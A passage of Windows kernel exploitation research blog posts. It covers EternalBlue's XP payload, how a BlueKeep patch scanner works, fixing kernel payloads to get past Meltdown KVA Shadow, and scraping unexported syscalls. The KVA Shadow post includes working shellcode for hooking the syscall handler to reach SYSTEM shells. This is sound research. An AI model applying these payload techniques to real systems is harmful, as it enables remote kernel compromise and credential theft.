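print(find_hal_pointer(single, NT_BASE, HAL_START, HAL_END))
```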

Eventually, the single-core version will find a HAL function, this time hal!HalCalibratePerformanceCounter:

This all checks out and is fine, and shows that Equation Group did a good job here for determining different types of XP NT.

HAL Variation Byte Table 

Now that a function within HAL has been found, the shellcode will attempt to locate hal!HalInitializeProcessor. It does so by carrying around a table (at shellcode offset 0x5e7) that contains a 1-byte length field followed by an expected sequence of bytes. The original discovered HAL function address is incremented in search of those bytes within the first 0x20 bytes of a new function.
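A stripped-down version of that signature search looks like the following. The byte patterns are placeholders I picked to represent a movzx and a plain mov, not the real bytes from the shellcode table, and the list of candidate function starts is handed in directly because how the shellcode steps between functions isn't covered here.

```python
MOVZX = bytes.fromhex("0fb6442404")  # placeholder: movzx eax, byte ptr [esp+4]
MOV = bytes.fromhex("8b442404")      # placeholder: mov eax, dword ptr [esp+4]

def parse_entry(table: bytes) -> bytes:
    """Table entry format: 1-byte length followed by that many bytes."""
    length = table[0]
    return table[1:1 + length]

def find_function(image: bytes, candidates, pattern: bytes, window=0x20):
    """Return the first candidate whose first 0x20 bytes contain the pattern."""
    for start in candidates:
        if pattern in image[start:start + window]:
            return start
    return None

def build_image(prologue: bytes) -> bytes:
    """Fake HAL image with the given bytes near the start of one function."""
    image = bytearray(0x100)
    image[0x83:0x83 + len(prologue)] = prologue
    return bytes(image)

table = bytes([len(MOVZX)]) + MOVZX
pattern = parse_entry(table)
candidates = [0x40, 0x80, 0xC0]      # hypothetical function start offsets

print(find_function(build_image(MOVZX), candidates, pattern))  # multi-core-like
print(find_function(build_image(MOV), candidates, pattern))    # single-core-like
```

A one-instruction difference in the compiled function is enough for the search to come back empty, which is the failure mode described next.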

The desired 5 bytes are easily found in the multi-core version of HAL:

However, the function on single-core HAL is much different.

There is a similar mov instruction, but it is not a movzx. The byte sequence being searched for is not present in this function, and consequently the function is not discovered.

Conclusion 

It is well known (from many flame wars on Windows kernel development mailing lists) that searching for byte sequences to identify functions is unreliable across different versions and service packs of Windows. We have learned from this bug that exploit developers must also be careful to account for differences in single/multi-core and PAE variations of NTOSKRNL and HAL. In this case, the compiler decided to change one movzx instruction to a mov instruction and broke the entire payload.

It is very curious that the KdVersionBlock trick and a byte sequence search are used to find functions in this payload. The Windows 7 payload finds NT and its exports in what has proven to be a more reliable way, by searching backwards in memory from the KPCR IDT and then parsing PE headers.

This HAL function can be found through such other means (it appears readily exported by HAL). The corrupted KPCR can also be cleaned up in other ways. But those are both exercises for the reader.

There is circumstantial evidence that primary FuzzBunch development started in late 2001. It seems the payload may only have been written for and tested against multi-core processors. Perhaps this is an indicator of how recently the XP exploit was first written. Windows XP was broadly released on October 25, 2001. While this is the same year that IBM invented the first dual-core processor (POWER4), Intel and AMD would not have a similar offering until 2004 and 2005, respectively.

This is yet another example of the evolution of these ETERNAL exploits. The Equation Group could have re-used the same exploit and payload primitives, yet chose to develop them using many different methodologies, perhaps so if one methodology was burned they could continue to reap the benefits of their exploit diversification. There is much esoteric Windows kernel internals knowledge that can be learned from studying these exploits.

Avoiding the DoS: How BlueKeep Scanners Work

31 May 2019 at 07:00

Background 

On May 21, @JaGoTu and I released a proof-of-concept on GitHub for CVE-2019-0708. This vulnerability has been nicknamed "BlueKeep".

Instead of causing code execution or a blue screen, our exploit was able to determine if the patch was installed.

Now that there are public denial-of-service exploits, I am willing to give a quick overview of the luck that allows the scanner to avoid a blue screen and determine if the target is patched or not.

RDP Channel Internals 

The RDP protocol has the ability to be extended through the use of static (and dynamic) virtual channels, relating back to the Citrix ICA protocol.

The basic premise of the vulnerability is that there is the ability to bind a static channel named "MS_T120" (which is actually a non-alpha illegal name) outside of its normal bucket. This channel is normally only used internally by Microsoft components, and shouldn't receive arbitrary messages.

There are dozens of components that make up RDP internals, including several user-mode DLLs hosted in a SVCHOST.EXE and an assortment of kernel-mode drivers. Sending messages on the MS_T120 channel enables an attacker to perform a use-after-free inside the TERMDD.SYS driver.

That should be enough information to follow the rest of this post. More background information is available from ZDI.

MS_T120 I/O Completion Packets 

After you perform the 200-step handshake required for the (non-NLA) RDP protocol, you can send messages to the individual channels you've requested to bind.

The MS_T120 channel messages are managed in the user-mode component RDPWSX.DLL. This DLL spawns a thread which loops in the function rdpwsx!IoThreadFunc. The loop waits via I/O completion port for new messages from network traffic that gets funneled through the TERMDD.SYS driver.

Note that most of these functions are inlined on Windows 7, but visible on Windows XP. For this reason I will use XP in screenshots for this analysis.

MS_T120 Port Data Dispatch 

On a successful I/O completion packet, the data is sent to the rdpwsx!MCSPortData function. Here are the relevant parts:

We see there are only two valid opcodes in the rdpwsx!MCSPortData dispatch:

    0x0 - rdpwsx!HandleConnectProviderIndication
    0x2 - rdpwsx!HandleDisconnectProviderIndication + rdpwsx!MCSChannelClose

If the opcode is 0x2, the rdpwsx!HandleDisconnectProviderIndication function is called to perform some cleanup, and then the channel is closed with rdpwsx!MCSChannelClose.

Since there are only two messages, there really isn't much to fuzz in order to cause the BSoD. In fact, almost any message dispatched with opcode 0x2, outside of what the RDP components are expecting, should cause this to happen.

Patch Detection 

I said almost any message, because if you send the right sized packet, you will ensure that proper cleanup is performed:

It's real simple: If you send an MS_T120 Disconnect Provider (0x2) message that is a valid size, you get proper cleanup. There should be no risk of denial-of-service.

The use-after-free leading to RCE and DoS only occurs if this function skips the cleanup because the message is the wrong size!

Vulnerable Host Behavior 

On a VULNERABLE host, sending the 0x2 message of valid size causes the RDP server to clean up and close the MS_T120 channel. The server then sends an MCS Disconnect Provider Ultimatum PDU packet, essentially telling the client to go away.

And of course, with an invalid size, you RCE/BSoD.

Patched Host Behavior 

However on a patched host, sending the MS_T120 channel message in the first place is a NOP... with the patch you can no longer bind this channel incorrectly and send messages to it. Therefore, you will not receive any disconnection notice.

In our scanner PoC, we sleep for 5 seconds waiting for the MCS Disconnect Provider Ultimatum PDU, before reporting the host as patched.
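The decision itself can be sketched in C as a pure function. This is not the scanner's actual code: the names `is_disconnect_ultimatum` and `classify` are hypothetical, and the sketch assumes an unencrypted frame made of a 4-byte TPKT header and a 3-byte X.224 data header, followed by an MCS PDU whose first byte carries the T.125 choice index (8 for Disconnect Provider Ultimatum) in its upper six bits. Socket handling and the 5 second wait are left to the caller.

```c
#include <stddef.h>
#include <stdint.h>

enum scan_result { HOST_PATCHED, HOST_VULNERABLE };

#define MCS_DPUM 8  /* T.125 DomainMCSPDU choice: disconnectProviderUltimatum */

/* pkt is assumed to be one TPKT frame: 4-byte TPKT header, 3-byte X.224
 * data header, then the MCS PDU. */
static int is_disconnect_ultimatum(const uint8_t *pkt, size_t len)
{
    if (len < 8)
        return 0;
    if (pkt[0] != 0x03)   /* TPKT version */
        return 0;
    if (pkt[5] != 0xf0)   /* X.224 data TPDU code */
        return 0;
    return (pkt[7] >> 2) == MCS_DPUM;
}

/* got_reply: nonzero if a frame arrived before the timeout expired. */
static enum scan_result classify(int got_reply, const uint8_t *pkt, size_t len)
{
    if (got_reply && is_disconnect_ultimatum(pkt, len))
        return HOST_VULNERABLE;
    return HOST_PATCHED;  /* timeout or unrelated traffic */
}
```

A real scanner would likely want more states than these two, for example to report hosts that drop the connection for unrelated reasons.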

CPU Architecture Differences 

Another stroke of luck is the ability to mix and match the x86 and x64 versions of the 0x2 message. The 0x2 messages require different sizes between the two architectures, so one might think that sending both at once would cause the denial-of-service.

Simply put, besides the sizes being different, the message opcode is at a different offset. So on the opposite architecture, with a zeroed-out packet (besides the opcode), it will think you are trying to perform the Connect 0x0 message. The Connect 0x0 message requires a much larger message and other miscellaneous checks to pass before proceeding, so the message for the other architecture will just be ignored.

This difference can possibly also be used in an RCE exploit to detect if the target is x86 or x64, if a universal payload is not used.

Conclusion 

This is an interesting quirk that luckily allows system administrators to quickly detect which assets remain unpatched within their networks. I released a similar scanner for MS17-010 about a week after the patch, however it went largely unused until big-name worms such as WannaCry and NotPetya started to hit. Hopefully history won't repeat and people will use this tool before a crisis.

Unfortunately, @ErrataRob used a fork of our original scanner to determine that almost 1 million hosts are confirmed vulnerable and exposed on the external Internet.

To my knowledge, the 360 Vulcan team released a (closed-source) scanner before @JaGoTu and I, which probably follows a similar methodology. Products such as Nessus have now incorporated plugins with this methodology. While this blog post discusses new details about RDP internals related to the vulnerability, it does not contain useful information for producing an RCE exploit that is not already widely known.

Fixing Remote Windows Kernel Payloads to Bypass Meltdown KVA Shadow

8 November 2019 at 07:03

Update 11/8/2019: @sleepya_ informed me that the call-site for BlueKeep shellcode is actually at PASSIVE_LEVEL. Some parts of the call gadget function acquire locks and raise IRQL, causing certain crashes I saw during early exploit development. In short, payloads can be written that don't need to deal with KVA Shadow. However, this writeup can still be useful for kernel exploits such as EternalBlue and possibly future others.

Background 

BlueKeep is a fussy exploit. In a lab environment, the Metasploit module can be a decently reliable exploit*. But out in the wild on penetration tests the results have been... lackluster.

While I mostly blamed my failed experiences on the mystical reptilian forces that control everything, something inside me yearned for a more difficult explanation.

After the first known BlueKeep attacks hit this past weekend, a tweet by sleepya slipped under the radar, but immediately clued me in to at least one major issue.

From call stack, seems target has kva shadow patch. Original eternalblue kernel shellcode cannot be used on kva shadow patch target. So the exploit failed while running kernel shellcode

— Worawit Wang (@sleepya_) November 3, 2019

Turns out my BlueKeep development labs didn't have the Meltdown patch, yet out in the wild it's probably the most common case.

tl;dr: Side effects of the Meltdown patch inadvertently break the syscall hooking kernel payloads used in exploits such as EternalBlue and BlueKeep. Here is a horribly hacky way to get around it... but: it pops system shells so you can run Mimikatz, and after all isn't that what it's all about?

Galaxy Brain tl;dr: Inline hook compatibility for both KiSystemCall64Shadow and KiSystemCall64 instead of replacing IA32_LSTAR MSR.

PoC||GTFO: Experimental MSF BlueKeep + Meltdown Diff GitHub

* Fine print: BlueKeep can be reliable with proper knowledge of the NPP base address, which varies radically across VM families due to hotfix memory increasing the PFN table size. There's also an outstanding issue or two with the lock in the channel structure, but I digress.

Meltdown CPU Vulnerability 

Meltdown (CVE-2017-5754), released alongside Spectre as "Variant 3", is a speculative execution CPU bug announced in January 2018.

As an optimization, modern processors load, evaluate, and branch ("speculate") well before these operations are "actually" due to run. This can cause effects that can be measured through side channels such as cache timing attacks. Through some clever engineering, Meltdown can be abused to read kernel memory from a rogue userland process.

KVA Shadow 

Windows mitigates Meltdown through the use of Kernel Virtual Address (KVA) Shadow, known as Kernel Page-Table Isolation (KPTI) on Linux, which are differing implementations of the KAISER fix in the original whitepaper.

When a thread is in user-mode, its virtual memory page tables should not have any knowledge of kernel memory. In practice, a small subset of kernel code and structures must be exposed (the "Shadow"), enough to swap to the kernel page tables during trap exceptions, syscalls, and similar.

Switching between user and kernel page tables on x64 is performed relatively quickly, as it is just swapping out a pointer stored in the CR3 register.

KiSystemCall64Shadow Changes 

The above illustrated process can be seen in the patch diff between the old and new NTOSKRNL system call routines.

Here is the original KiSystemCall64 syscall routine (before Meltdown):

The swapgs instruction changes to the kernel gs segment, which has a KPCR structure at offset 0. The user stack is stored at gs:0x10 (KPCR->UserRsp) and the kernel stack is loaded from gs:0x1a8 (KPCR->Prcb.RspBase).

Compare to the KiSystemCall64Shadow syscall routine (after the Meltdown patch):

  1. Swap to kernel GS segment
  2. Save user stack to KPCR->Prcb.UserRspShadow
  3. Check if KPCR->Prcb.ShadowFlags first bit is set
     • Set CR3 to KPCR->Prcb.KernelDirectoryTableBase
  4. Load kernel stack from KPCR->Prcb.RspBaseShadow

The kernel chooses whether to use the Shadow version of the syscall at boot time in nt!KiInitializeBootStructures, and sets the ShadowFlags appropriately.

    NOTE: I have highlighted the common push 2b instructions above, as they will be important for the shellcode to find later on.

    Existing Remote Kernel Payloads 

    The authoritative guide to kernel payloads is in Uninformed Volume 3 Article 4 by skape and bugcheck. There you can read all about the difficulties in tasks such as lowering IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL, as well as moving code execution out from Ring 0 and into Ring 3.

    Hooking IA32_LSTAR MSR 

    In both EternalBlue and BlueKeep, the exploit payloads start at the DISPATCH_LEVEL IRQL.

    To oversimplify, on Windows NT the processor Interrupt Request Level (IRQL) is used as a sort of locking mechanism to prioritize different types of kernel interrupts. Lowering the IRQL from DISPATCH_LEVEL to PASSIVE_LEVEL is a requirement to access paged memory and execute certain kernel routines that are required to queue a user mode APC and escape Ring 0. If IRQL is dropped artificially, deadlocks and other bugcheck unpleasantries can occur.

    One of the easiest, hackiest, and KPP detectable ways (yet somehow also one of the cleanest) is to simply write the IA32_LSTAR (0xc0000082) MSR with an attacker-controlled function. This MSR holds the system call function pointer.

    User mode executes at PASSIVE_LEVEL, so we just have to change the syscall MSR to point at a secondary shellcode stage, and wait for the next system call allowing code execution at the required lower IRQL. Of course, existing payloads store and change it back to its original value when they're done with this stage.

    Double Fault Root Cause Analysis 

    Hooking the syscall MSR works perfectly fine without the Meltdown patch (not counting Windows 10 VBS mitigations, etc.). However, if KVA Shadow is enabled, the target will crash with an UNEXPECTED_KERNEL_MODE_TRAP (0x7F) bugcheck with argument EXCEPTION_DOUBLE_FAULT (0x8).

    We can see that at this point, user mode can see the KiSystemCall64Shadow function:

    However, user mode cannot see our shellcode location:

    The shellcode page is NOT part of the KVA Shadow code, so user mode doesn't know of its existence. The kernel gets stuck in a recursive loop of trying to handle the page fault until everything explodes!

    Hooking KiSystemCall64Shadow 

    So the Galaxy Brain moment: instead of replacing the IA32_LSTAR MSR with a fake syscall, how about just dropping an inline hook into KiSystemCall64Shadow? After all, the KVASCODE section in ntoskrnl is full of beautiful, non-paged, RWX, padded, and userland-visible memory.

    Heuristic Offset Detection 

    We want to accomplish two things:

    1. Install our hook in a spot after the kernel page tables are loaded into CR3.
    2. Provide compatibility for both KiSystemCall64Shadow and KiSystemCall64 targets.

    For this reason, I scan for the push 2b sequence mentioned earlier. Even though this instruction is 2 bytes long (also relevant later), I use a 4-byte heuristic pattern (0x652b6a00 little endian) as the preceding byte and following byte are stable in all versions of ntoskrnl that I analyzed.

    The following shellcode is the 0th stage that runs after exploitation:

    payload_start:
    ; read IA32_LSTAR
        mov ecx, 0xc0000082         
        rdmsr
    
        shl rdx, 0x20
        or rax, rdx                 
        push rax
    
    ; rsi = &KiSystemCall64Shadow
        pop rsi                      
    
    ; this loop stores the offset to push 2b into ecx
    _find_push2b_start:
        xor ecx, ecx
        mov ebx, 0x652b6a00
    
    _find_push2b_loop:
        inc ecx
        cmp ebx, dword [rsi + rcx - 1]
        jne _find_push2b_loop
    

    This heuristic is amazingly solid, and keeps the shellcode portable for both versions of the system call. There are even offset differences between the Windows 7 and Windows 10 KPCR structure that don't matter thanks to this method.
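For readers who prefer C to assembly, the scan loop can be sketched as follows. The function name `find_push2b_offset` is hypothetical, and unlike the shellcode (which scans until it finds a match) this version takes a length and returns -1 when the pattern is absent.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Scans for the 4-byte heuristic 00 6a 2b 65 (0x652b6a00 as a
 * little-endian dword) and returns the offset of the `push 2b`
 * instruction (6a 2b), which sits one byte into the pattern.
 * Returns -1 if the pattern is not found within len bytes. */
static long find_push2b_offset(const uint8_t *code, size_t len)
{
    static const uint8_t pattern[4] = {0x00, 0x6a, 0x2b, 0x65};

    for (size_t i = 0; i + sizeof pattern <= len; i++) {
        if (memcmp(code + i, pattern, sizeof pattern) == 0)
            return (long)(i + 1);  /* skip the stable preceding byte */
    }
    return -1;
}
```

The returned value corresponds to what the assembly loop leaves in ecx: the pattern is compared at `rsi + rcx - 1`, so ecx itself indexes the 6a byte.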

    The offset and syscall address are stored in a shared memory location between the two stages, for dealing with the later cleanup.

    Atomic x64 Function Hooking 

    It is well known that inline hooking on x64 comes with certain annoyances. All code overwrites need to be atomic operations in order to not corrupt the executing state of other threads. There is no direct jmp imm64 instruction, and early x64 CPUs didn't even have a lock cmpxchg16b instruction!

    Fortunately, Microsoft has hotpatching built into its compiler. Among other things, this allows Microsoft to patch certain functionality or vulnerabilities of Windows without needing to reboot the system, if they like. Essentially, any function that is hotpatch-able gets padded with NOP instructions before its prologue. You can put the ultimate jmp target code gadgets in this hotpatch area, and then do a small jmp inside of the function body to the gadget.

    We're in x64 world so there's no classic mov edi, edi 2-byte NOP in the prologue; however in all ntoskrnl that I analyzed, there were either 0x20 or 0x40 bytes worth of NOP preceding the system call routine. So before we attempt to do anything fancy with the small jmp, we can install the BIG JMP function to our fake syscall:

    ; install hook call in KiSystemCall64Shadow NOP padding
    install_big_jmp:
    
    ; bytes 90 57 48 bf = nop; push rdi; movabs rdi, &fake_syscall_hook
        mov dword [rsi - 0x10], 0xbf485790 
        lea rdi, [rel fake_syscall_hook]
        mov qword [rsi - 0xc], rdi
    
    ; bytes 57 c3 = push rdi; ret
        mov word [rsi - 0x4], 0xc357
    
    ; ... 
    
    fake_syscall_hook:
    
    ; ...
    
    

    Now here's where I took a bit of a shortcut. Upon disassembling C++ std::atomic<std::uint16_t>, I saw that mov word ptr is an atomic operation (although sometimes the compiler will guard it with the poetic mfence).

    Fortunately, small jmp is 2 bytes, and the push 2b I want to overwrite is 2 bytes.

    ; install tiny jmp to the NOP padding jmp
    install_small_jmp:
    
    ; rsi = &syscall+push2b
        add rsi, rcx
    
    ; eax = jmp -x
    ; fix -x to actual offset required
        mov eax, 0xfeeb
        shl ecx, 0x8
        sub eax, ecx
        sub eax, 0x1000
    
    ; push 2b => jmp -x;
        mov word [rsi], ax        
    

    And now the hooks are installed (note some instructions are off because of x64 instruction variable length and alignment):

    On the next system call, the kernel stack and page tables will be loaded, our small jmp hook will go to the big jmp, and the big jmp will go to our fake syscall handler at PASSIVE_LEVEL.
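The byte encodings behind the two hooks can be sketched in C. The helper names `encode_big_jmp` and `encode_small_jmp` are hypothetical; the sketch only computes the bytes the shellcode writes and does not patch any memory. It assumes, as in the shellcode, that the big jmp gadget starts 0x10 bytes before the syscall routine.

```c
#include <stdint.h>
#include <string.h>

#define BIG_JMP_OFFSET 0x10  /* gadget starts 0x10 bytes before the routine */

/* 14-byte gadget: nop; push rdi; movabs rdi, hook; push rdi; ret */
static void encode_big_jmp(uint8_t out[14], uint64_t hook)
{
    static const uint8_t head[4] = {0x90, 0x57, 0x48, 0xbf};

    memcpy(out, head, sizeof head);
    for (int i = 0; i < 8; i++)            /* little-endian imm64 */
        out[4 + i] = (uint8_t)(hook >> (8 * i));
    out[12] = 0x57;                        /* push rdi */
    out[13] = 0xc3;                        /* ret */
}

/* 2-byte `jmp rel8` placed over `push 2b`, targeting the gadget.
 * Returns 0 on success, -1 if the gadget is out of rel8 range. */
static int encode_small_jmp(uint32_t push2b_offset, uint8_t out[2])
{
    if (push2b_offset > 0x6e)              /* displacement below -128 */
        return -1;

    /* rel8 is measured from the end of the 2-byte jmp instruction */
    int32_t rel = -(int32_t)(push2b_offset + 2 + BIG_JMP_OFFSET);

    out[0] = 0xeb;                         /* jmp short */
    out[1] = (uint8_t)rel;
    return 0;
}
```

The displacement matches the shellcode's arithmetic: 0xfe minus the offset minus 0x10 in the high byte of 0xfeeb. The range check makes explicit that the trick only works while `push 2b` sits within rel8 reach of the padding.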

    Cleaning Up the Hook 

    Multiple threads will enter into the fake syscall, so I use the existing sleepya_ locking mechanism to only queue a single APC with a lock:

    ; this syscall hook is called AFTER kernel stack+KVA shadow is setup
    fake_syscall_hook:
    
    ; save all volatile registers
        push rax
        push rbp
        push rcx
        push rdx
        push r8
        push r9
        push r10
        push r11
    
        mov rbp, STAGE_SHARED_MEM
    
    ; use lock cmpxchg for queueing APC only one at a time
    single_thread_gate:
        xor eax, eax
        mov dl, 1
        lock cmpxchg byte [rbp + SINGLE_THREAD_LOCK], dl
        jnz _restore_syscall
    
    ; only 1 thread has this lock
    ; allow interrupts while executing ring0 to ring3
        sti
        call r0_to_r3
        cli
    
    ; all threads can clean up
    _restore_syscall:
    
    ; calculate offset to 0x2b using shared storage
        mov rdi, qword [rbp + STORAGE_SYSCALL_OFFSET]
        mov eax, dword [rbp + STORAGE_PUSH2B_OFFSET]
        add rdi, rax
    
    ; atomic change small jmp to push 2b
        mov word [rdi], 0x2b6a
    

    All threads restore the push 2b, as the code flow results in fewer bytes, no extra locking, and shouldn't matter.
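The single-thread gate is an ordinary compare-and-swap. A rough C11 equivalent of the `lock cmpxchg` sequence, with the hypothetical name `try_enter_gate`, looks like this:

```c
#include <stdatomic.h>
#include <stdbool.h>

/* Returns true for exactly one caller: the first to swap the lock
 * byte from 0 (free) to 1 (taken). Every later caller sees 1, fails
 * the comparison, and falls through to the cleanup path. */
static bool try_enter_gate(atomic_uchar *lock)
{
    unsigned char expected = 0;
    return atomic_compare_exchange_strong(lock, &expected, 1);
}
```

The lock is never released, which is intentional here: only one APC should ever be queued.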

    Finally, with push 2b restored, we just have to restore the stack and jmp back into the KiSystemCall64Shadow function.

    _syscall_hook_done:
    
    ; restore register values
        pop r11
        pop r10
        pop r9
        pop r8
        pop rdx
        pop rcx
        pop rbp
        pop rax
    
    ; rdi still holds push2b offset!
    ; but needs to be restored
    
    ; do not cause bugcheck 0xc4 arg1=0x91
        mov qword [rsp-0x20], rdi
        pop rdi
    
    ; return to &KiSystemCall64Shadow+push2b
        jmp [rsp-0x28]
    

    You end up with a small chicken and egg problem at the end. You want to keep the stack pristine. My first naive solution ended in a DRIVER_VERIFIER_DETECTED_VIOLATION (0xc4) bugcheck, so I throw the return value deep in the stack out of laziness.

    Conclusion 

    Here is a BlueKeep exploit with the new payload against the February 20, 2019 NT kernel, one of the more likely scenarios for a target patched for Meltdown yet still vulnerable to BlueKeep. The Meterpreter session stays alive for a few hours so I'm guessing KPP isn't fast enough just like with the IA32_LSTAR method.

    It's simple, it's obvious, it's hacky; but it works and so it's what you want.

    "Heresy's Gate": Kernel Zw*/NTDLL Scraping + "Work Out": Ring 0 to Ring 3 via Worker Factories

    14 June 2020 at 23:19

    Introduction 

    What's in a name? Naming things is the first step in being able to talk about them.

    What's a lower realm than Hell? Heresy is the 6th Circle of Hell in Dante's Inferno.

    With Hell's Gate scraping syscalls in user-mode, you can think about Heresy's Gate as the generic methodology to dynamically generate and execute kernel-mode syscall stubs that are not exported by ntoskrnl.exe. Much like Hell's Gate, the general idea has been discussed previously (in this case since at least NT 4), however older techniques (Nebbett's Gate) no longer work and this post may introduce new methods.

    A proud people who believe in political throwback, that's not all I'm here to present you.

    Unlocking Heresy's Gate, among other things, gives access to a plethora of novel Ring 0 (kernel) to Ring 3 (user) transitions, as is required by exploit payloads in EternalBlue (DoublePulsar), BlueKeep, and SMBGhost. Just to name a few.

    I will describe such a method, Work Out, using the undocumented Worker Factory feature that is the kernel backbone of the user-mode Thread Pool API added in Windows Vista.

    tl;dr: PoC || GTFO GitHub

    All of this information was casually shared with a member of MSRC and forwarded to the Windows Defender team prior to publication. These are not vulnerabilities; Heresy's Gate is rootkit tradecraft to execute private syscalls, and Work Out is a new kernel mode exploit payload.

    I have no knowledge of if/how/when mitigations/ETW/etc. may be added to NT.

    Heresy's Gate 

    Many fun routines are not readily exported by the Executive binary (ntoskrnl.exe). They simply do not exist in import/export directories for any module. And with their ntoskrnl.exe file/RVA offsets changing between each compile, they can be difficult to find in a generic way. Not exactly ASLR, but similar.

    However, if a syscall exists, NTDLL.DLL/USER32.DLL/WIN32U.DLL are gonna have stubs for them.

    • Heaven's Gate: Execute 64-bit syscalls in WoW64 (32-bit code)
    • Hell's Gate: Execute syscalls in user-mode directly by scraping ntdll op codes
    • Heresy's Gate: Execute unexported syscalls in kernel-mode (described here by scraping ntdll and &ZwReadFile)

    I'll lump Heaven's Gate into this, even though it is only semi-related. Alex Ionescu has written about how CFG killed the original technique.

    I guess if you went further up the chain than WoW64, or perhaps something fancy in managed code land or a Universal Windows Platform app, you'd have a Higher Gate? And since Heresy is only the sixth circle, there's still room to go lower... HAL's Gate?

    Closing Nebbett's Gate 

    People have been heuristically scanning function signatures and even disassembling in the kernel for ages to find unexported routines. I wondered what the earliest reference would be for executing an unexported routine.

    Gary Nebbett describes, on pages 433-434 of "Windows NT/2000 Native API Reference", finding unexported syscalls in ntdll and executing their user-mode stubs directly in kernel mode!

    Interesting indeed. I thought: there's no way this code could still work!

    Open questions:

    1. There must be issues with how the syscall stub has changed over the years?
    2. Can modern "syscall" instruction (not int 0x2e) even execute in kernel mode?
    3. There's probably issues with modern kernels implementing SMEP (though you could just Capcom it and piss off PatchGuard in your payload).
    4. Will this screw up PreviousMode and we need user buffers and such?
    5. Aren't these ntdll functions often hooked by user-mode antivirus code?
    6. What about the logic of Meltdown KVA Shadow?

    Meltdown KVA Shadow Page Fault Loop 

    And indeed, it seems that the Meltdown KVA Shadow strikes again to spoil our exploit payload fun.

    I attempted this method on Windows 10 x64 and to my surprise I did not immediately crash! However, my call to sc.exe appeared to hang forever.

    Let's peek at what the thread is doing:

    Oof, it appears to be in some type of a page fault loop. Indeed setting a breakpoint on KiPageFaultShadow will cause it to hit over and over.

    Maybe this and all the other potential issues could be worked around?

    Instead of fighting with Meltdown patch and all the other outstanding issues, I decided to scrape opcodes out of NTDLL and copy an exported Zw function stub out of the Executive.

    NTDLL Opcode Scraping 

    To scrape an opcode number out of NTDLL, we must find its Base Address in kernel mode. There are at least 3 ways to accomplish this.

    1. You can map it out of a process's PEB->Ldr using PsGetProcessPeb() while under KeStackAttachProcess().
    2. You can call ZwQuerySystemInformation() with the SystemModuleInformation class.
    3. You can look it up in the KnownDlls section object.

    KnownDlls Section Object 

    I thought the last one is the most interesting and perhaps less known for antivirus detection methods, so we'll go with that. However, I think if I was writing a shellcode I'd go with the first one.

    NTSTATUS NTAPI GetNtdllBaseAddressFromKnownDlls(
        _In_ ZW_QUERY_SECTION __ZwQuerySection,
        _Out_ PVOID *OutAddress
    )
    {
        static UNICODE_STRING KnownDllsNtdllName = 
            RTL_CONSTANT_STRING(L"\\KnownDlls\\ntdll.dll");
    
        NTSTATUS Status = STATUS_SUCCESS;
    
        OBJECT_ATTRIBUTES ObjectAttributes = { 0 };
        InitializeObjectAttributes(
            &ObjectAttributes, 
            &KnownDllsNtdllName, 
            OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE, 
            0, 
            NULL
        );
    
        HANDLE SectionHandle = NULL;
    
        Status = ZwOpenSection(&SectionHandle, SECTION_QUERY, &ObjectAttributes);
    
        if (NT_SUCCESS(Status))
        {
            // +0x1000 because kernel only checks min size
            UCHAR SectionInfo[0x1000]; 
    
            Status = __ZwQuerySection(
                SectionHandle,
                SectionImageInformation,
                &SectionInfo, 
                sizeof(SectionInfo), 
                0
            );
    
            if (NT_SUCCESS(Status))
            {
                *OutAddress = 
                    ((SECTION_IMAGE_INFORMATION*)&SectionInfo)
                        ->TransferAddress;
            }
    
            ZwClose(SectionHandle);
        }
    
        return Status;
    }
    

    This requires the following struct definition:

    typedef struct _SECTION_IMAGE_INFORMATION {
        PVOID TransferAddress;
        // ...
    } SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION;
    

    Once you have the NTDLL base address, it is a well-known process to read the PE export directory to find functions by name/ordinal.
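As a reminder of that process, here is a minimal user-mode sketch in C that walks the export directory of a mapped PE32+ image by raw offsets. The function name `find_export_rva` and the helpers are hypothetical, forwarded exports and lookup by ordinal are ignored, and the bounds checks are only as thorough as a sketch needs.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static int fits(size_t size, uint64_t off, uint64_t need)
{
    return off <= size && need <= size - off;
}

/* Returns the RVA of the named export in a mapped PE32+ image, or 0. */
static uint32_t find_export_rva(const uint8_t *img, size_t size, const char *name)
{
    size_t name_len = strlen(name) + 1;              /* compare the NUL too */

    if (!fits(size, 0, 0x40) || rd16(img) != 0x5a4d) /* "MZ" */
        return 0;
    uint32_t nt = rd32(img + 0x3c);                  /* e_lfanew */
    if (!fits(size, nt, 24 + 0x78) || rd32(img + nt) != 0x00004550) /* "PE\0\0" */
        return 0;
    const uint8_t *opt = img + nt + 24;              /* optional header */
    if (rd16(opt) != 0x20b)                          /* PE32+ only */
        return 0;
    uint32_t exp = rd32(opt + 0x70);                 /* DataDirectory[0] RVA */
    if (exp == 0 || !fits(size, exp, 40))
        return 0;

    uint32_t count = rd32(img + exp + 0x18);         /* NumberOfNames */
    uint32_t funcs = rd32(img + exp + 0x1c);         /* AddressOfFunctions */
    uint32_t names = rd32(img + exp + 0x20);         /* AddressOfNames */
    uint32_t ords  = rd32(img + exp + 0x24);         /* AddressOfNameOrdinals */

    for (uint32_t i = 0; i < count; i++) {
        if (!fits(size, (uint64_t)names + 4ull * i, 4) ||
            !fits(size, (uint64_t)ords + 2ull * i, 2))
            return 0;
        uint32_t name_rva = rd32(img + names + 4 * (size_t)i);
        if (!fits(size, name_rva, name_len) ||
            memcmp(img + name_rva, name, name_len) != 0)
            continue;
        uint16_t ord = rd16(img + ords + 2 * (size_t)i);
        if (!fits(size, (uint64_t)funcs + 4ull * ord, 4))
            return 0;
        return rd32(img + funcs + 4 * (size_t)ord);
    }
    return 0;
}
```

Adding the returned RVA to the image base gives the address of the stub to scrape.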

    Extracting Syscall Opcode 

    Let's inspect an NTDLL syscall.

    Note: Syscalls have changed a lot over the years.

    However, the MOV EAX, #OPCODE part is probably pretty stable. And since syscall numbers are used as a table index, they are never larger than 0xFFFF, so the higher-order bits will be 0x0000.

    You can scan for the opcode using the following mask:

    UCHAR WildCardByte = 0xff; // unsigned, so it compares equal to UCHAR mask bytes
    
    //  b8 ?? ?? 00 00  mov eax, 0x0000????
    UCHAR NtdllScanMask[] = "\xb8\xff\xff\x00\x00"; 
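
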